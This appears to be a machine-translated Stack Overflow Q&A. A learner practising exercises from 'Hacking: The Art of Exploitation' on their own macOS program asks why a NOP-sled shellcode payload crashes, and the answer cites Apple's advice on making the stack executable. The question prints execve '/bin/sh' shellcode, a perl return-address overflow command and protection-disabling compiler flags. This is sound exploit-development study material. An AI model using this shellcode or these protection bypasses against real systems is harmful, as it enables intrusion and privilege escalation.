car*_*ter 2 c security macos gcc shellcode
我现在正在经历"Hacking;剥削艺术",并且正在练习编写shell代码注入我编写的一些示例代码.
我正在将shell代码注入环境变量.在lldb中,我可以看到我正在覆盖返回地址,并且EIP被设置为我的NOP雪橇的中间位置.但是,它会抛出"EXC_BAD_ACCESS"和段错误.
这是我的shellcode的堆栈部分:
0xbffffbd8: "SHELL=/bin/sh"
0xbffffbe6: "SHELLCODE=\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff901\xffffffc01\xffffffdb1\xffffffc9\xffffff99\xffffffb0\xffffffa4\xffffffcd\xffffff80j\vXQh//shh/bin\xffffff89\xffffffe3Q\xffffff89\xffffffe2S\xffffff89\xffffffe1\xffffffcd\xffffff80"
0xbffffcdc: "SHLVL=4"
调用lldb ./notesearch $(perl -e 'print "\x5e\xfc\xff\xbf"x40')执行缓冲区溢出,这是我们在segfaults时得到的:
Process 21713 stopped
* thread #1: tid = 0xa33bc3, 0xbffffc5e, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0xbffffc5e)
frame #0: 0xbffffc5e
-> 0xbffffc5e: nop
0xbffffc5f: nop
0xbffffc60: nop
0xbffffc61: nop
我正在使用
gcc -g -O0 -fno-stack-protector -D_FORTIFY_SOURCE=0 -fomit-frame-pointer
编译代码,我正在使用带有和选项集的change_mach_o_flags.py脚本.--no-pie--executable-heap
我认为问题是osx自动将堆栈设置为不可执行.不幸的是,-z execstack在osx中似乎没有gcc 的选项.也没有execstack使用的实用程序.
我已经浏览了网页,无论如何都无法找到我的编译代码中的堆栈可执行文件.有没有办法做到这一点,如果是这样,怎么样?
来自Apple开发人员文档:
有两种方法可以使堆栈和堆可执行:
将-allow_stack_execute标志传递给编译器.这使得堆栈(而不是堆)可执行.
使用mprotect系统调用将特定内存页标记为可执行文件.详细信息超出了本文档的范围.有关更多信息,请参见mprotect的手册页.
查看更多:https://developer.apple.com/library/content/documentation/Security/Conceptual/SecureCodingGuide/Articles/BufferOverflows.html